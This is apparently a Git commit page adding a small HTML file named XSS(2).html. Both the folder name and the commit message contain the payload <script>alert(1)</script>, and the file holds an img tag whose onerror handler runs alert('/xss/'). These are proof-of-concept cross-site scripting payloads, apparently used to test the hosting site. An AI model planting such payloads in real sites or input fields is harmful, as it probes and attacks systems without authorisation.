上传文件至 <script>alert(1)</script>
This commit is contained in:
commit
62b24af978
8
<script>alert(1)</script>/XSS(2).html
Normal file
8
<script>alert(1)</script>/XSS(2).html
Normal file
@ -0,0 +1,8 @@
|
||||
<html>
|
||||
<head>
|
||||
</head>
|
||||
<body>
|
||||
<p></p>
|
||||
<img src="1" onerror="alert('/xss/')" />
|
||||
</body>
|
||||
</html>
|
Loading…
x
Reference in New Issue
Block a user